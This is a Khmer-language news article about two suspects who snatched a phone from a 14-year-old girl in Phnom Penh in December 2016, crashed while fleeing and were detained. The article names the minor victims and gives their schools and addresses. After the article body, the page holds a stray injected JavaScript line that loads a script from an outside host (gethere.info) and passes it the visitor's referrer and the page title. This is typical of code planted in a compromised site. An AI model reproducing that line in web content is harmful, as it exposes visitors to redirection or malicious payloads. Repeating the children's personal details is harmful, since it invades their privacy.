ព្រឹតិ្តការណ៍ថ្មីៗ

ជនសង្ស័យ២នាក់ធ្វើសកម្មភាពឆក់ទូរស័ព្ទដៃបានសម្រេច តែគេចខ្លួនមិនរួច ត្រូវអ្នកដំណើរស្វាគមន៍ទ្រមខ្លួន

2 ឆ្នាំ មុន 2 តូ សុផល

ភ្នំពេញ៖ ជនសង្ស័យ២នាក់បានធ្វើសកម្មភាពឆក់ទូរស័ព្ទដៃពីយុវត្តី២នាក់បានសម្រេចខណៈជិះម៉ូតូព្យាយាគេចខ្លួនក៍ជ្រុលចង្កូតទៅបុកនិងខឿនចិញ្ចើមផ្លូវបណ្តាលអោយបែកកង់ម៉ូតូខាងមុខដួល ហើយត្រូវអ្នកដំណើរតាមដងផ្លូវចាប់បាននិងស្វាគមន៍មួយដៃមួយជើងទំរាំតែសមត្ថកិច្ចទៅដល់ ទ្រមខ្លួន។ករណីនេះបង្កអោយមានការភ្ញាក់ផ្អើលកាលពីម៉ោង ១៤ និង៣០នាទីរសៀលថ្ងៃទី ២៨ ធ្នូ ២០១៦ នៅតាមបណ្តោយផ្លូវ ២០០៤ មុខសាលាអន្តរជាតិ CIA ភូមិស្លែងរលើង សង្កាត់ទឹកថ្លា ខណ្ឌសែនសុខ។

ជនសង្ស័យទី ១ មានឈ្មោះ ចាន់ ម៉ៅ អាយុ២៧ឆ្នាំ មុខរបរ មិនពិតប្រាកដ ស្នាក់នៅភូមិមានជ័យ១ សង្កាត់ស្ទឹងមានជ័យ ខណ្ឌមានជ័យ។ មានស្រុកកំណើតនៅភូមិបឹងរាំង ឃុំបឹងរាំង ស្រុកបាណន់ ខេត្តបាត់ដំបង(អ្នកបើកម៉ូតូ)។

ទី ២ ឈ្មោះ ស៊ុំ សុភា អាយុ ១៨ឆ្នាំ មុខរបរ ជាសិស្ស  រៀននៅមណ្ឌលភាពញញឹមនៃកុមារស្នាក់នៅភូមិមានជ័យ១ សង្កាត់ស្ទឹងមានជ័យ ខណ្ឌមានជ័យ។ (អ្នកធ្វើសកម្មភាពឆក់)

ចំណែកយុវត្តីរងគ្រោះ ឈ្មោះ ឡែន លីដា អាយុ ១៤ឆ្នាំ ជាសិស្សវិទ្យាល័យជាស៊ីមសន្ធរម៉ុក ស្នាក់នៅភូមិស្លែងរលើង សង្កាត់ទឹកថ្លា ខណ្ឌសែនសុខ។

តាមសំដីយុវត្តីរងគ្រោះបានប្រាប់សមត្ថកិច្ចថា មុនកើតហេតុ នាងបានជិះម៉ូតូមួយគ្រឿងម៉ាក TODAY ពណ៌ផ្កាឈូក ពាក់ស្លាកលេខភ្នំពេញ 1FL-1599ដោយមានមិត្តភ័ក្តិជាយុវត្តីដូចគ្នាម្នាក់ឈ្មោះ  ហេង មី ជីង អាយុ ១៤ឆ្នាំ រៀននៅសាលាជាមួយគ្នា ស្នាក់នៅផ្ទះលេខ ១៣៣ ផ្លូវលំ ភូមិថ្មី សង្កាត់ស្ទឹងមានជ័យ ខណ្ឌមានជ័យ ជាអ្នកឌុបចេញពីសាលារៀនគោលបំណងទៅផ្ទះនៅភូមិស្លែងរលើង ខណៈមកដល់ចំណុចខាងលើនាងបានយកទូរស័ព្ទម៉ាក Iphone5 ពណ៌ប្រាក់គោលបំណងចុចតេ  ស្រាប់តែមានជនសង្ស័យ ២នាក់មានជនសង្ស័យ២នាក់ជិះម៉ូតូ សេ c125 ពណ៌ខ្មៅ ពាក់ស្លាកលេខ ភ្នំពេញ 1AK-9762 មកពីក្រោយធ្វើសកម្មភាពឆក់ទូរស័ព្ទពីដៃនាងបានសម្រេច ពេលនោះធ្វើអោយម៉ូតូរបស់នាងដួលរងរបួសរលាត់ដៃជើងទាំងពីរនាក់ ។ ចំណែកជនសង្ស័យ ក្រោយពីឆក់បានសម្រេចហើយ បានព្យាយាមបើកម៉ូតូរត់ជ្រុលចង្កូតទៅបុកនិងខឿនចិញ្ចើមផ្លូវបណ្តាលអោយបែកកង់ម៉ូតូខាងមុខដួលហើយត្រូវអ្នកដំណើរតាមដងផ្លូវចាប់បាននិងស្វាគមន៍មួយដៃមួយជើងទំរាំតែសមត្ថកិច្ចទៅដល់ ទ្រមខ្លួន។

នៅចំពោះមុខសមត្ថកិច្ចជនសង្ស័យខាងលើ បានប្រកែកថាខ្លួនមិនឆក់ទូរស័ព្ទដៃរបស់យុវត្តីខាងលើទេ គ្រាន់ តែជិះប៉ះដៃចង្កូត បណ្តាលអោយម៉ូតូយុវត្តីខាងលើដួលប៉ុណ្ណោះ ដោយសារខ្លួនភ័យទើបបើកម៉ូតូរត់។

បច្ចុប្បន្នជនសង្ស័យទាំង២នាក់ក្រោយពីសាកសួរនៅប៉ុស្តិ៍ទឹកថ្លាចប់បានឃាត់ខ្លូនបណ្តោះអាសន្នយកមក អធិការ ដ្ឋាននគរបាលខណ្ឌសែនសុខដើម្បីសាកសួរបន្ត៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!